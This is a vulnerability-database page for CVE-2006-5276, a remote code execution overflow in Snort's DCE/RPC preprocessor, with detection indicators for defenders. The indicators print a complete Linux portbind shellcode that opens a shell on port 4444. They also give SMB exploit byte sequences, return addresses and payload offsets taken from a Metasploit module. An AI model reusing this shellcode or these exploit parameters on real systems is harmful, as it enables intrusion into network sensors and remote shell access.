cbcvebase.
CVE-2006-5276
published 2007-02-20

CVE-2006-5276: Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote…

PriorityP268critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
79.32%
99.6th percentile
Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic.

Affected

7 ranges
VendorProductVersion rangeFixed in
snortsnort<= 2.6.1.2
snortsnort
snortsnort
snortsnort
sourcefireintrusion_sensor
sourcefireintrusion_sensor
sourcefireintrusion_sensor

Detection & IOCsextracted from sources · hover to see the quote

port139
port4444
bytes
\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x99\x89\xe1\xcd\x80\x96\x43\x52\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x66\x58\x50\x51\x56\x89\xe1\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x52\x56\x43\x89\xe1\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
bytes
\xff\x53\x4d\x42\x75\x00\x00\x00\x00\x18\x07\xc8
bytes
\x05\x00\x0b\x03\x10\x00\x00\x00\x10\x02\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10
bytes
\xed\x1e\x94\x7c\x90\x81\xc4\xff\xef\xff\xff\x44
bytes
\x00\x00\xde\xad
bytes
\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80\x00\x48\x00\x00\x00\xff\x01
  • Exploit traffic targets TCP port 139 (NetBIOS/SMB) with crafted SMB Write AndX requests containing oversized DCE/RPC fragments; the Snort sensor itself is the victim, not the destination host.
  • Look for SMB traffic with a NetBIOS Session Service length field set to 0xDEAD (\x00\x00\xde\xad), which is the Metasploit module's static oversized length marker.
  • Detect two consecutive SMB Write AndX requests in a single TCP segment where the second Write AndX (\x0e\xff) carries an anomalously large DCE/RPC bind fragment — this is the overflow trigger pattern.
  • On Linux targets, watch for a new listener on TCP port 4444 spawned by the snort process after exploitation (portbind shellcode).
  • The Windows exploit uses a JMP ESP gadget at 0x7c941eed inside a standard Windows DLL; look for EIP/RET control redirected to that address in crash dumps or memory forensics.
  • The Metasploit module uses a Windows Universal RET of 0x00407c01 (JMP ESP in snort.exe) with a payload offset of 289 bytes, and a Redhat 8 RET of 0xbffff110 with offset 317 bytes — useful for stack-frame analysis.
  • SMB Tree Connect AndX targeting the IPC$ share path (\\<host>\IPC$) encoded in Unicode is present in all exploit variants as a precursor to the Write AndX overflow.
  • ·Affected Snort versions are 2.6.1, 2.6.1.1, 2.6.1.2, and 2.7.0 beta 1; the fix is Snort 2.6.1.3+ or 2.7 beta 2+. The DCE/RPC preprocessor must be enabled in snort.conf for the vulnerability to be exploitable.
  • ·SourceFire Intrusion Sensor versions 4.1, 4.5, and 4.6 are also vulnerable; patching scope extends beyond open-source Snort.
  • ·The exploit is effective against any host on the Snort-monitored network segment; the destination host does not need to be running SMB — Snort inspects the traffic passively and is itself the target.
  • ·The Metasploit module deregisters FILTER, PCAPFILE, SNAPLEN, and TIMEOUT options and uses raw packet injection (PacketFu/pcap), requiring the attacker to have raw socket / packet-injection capability on the monitored network.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.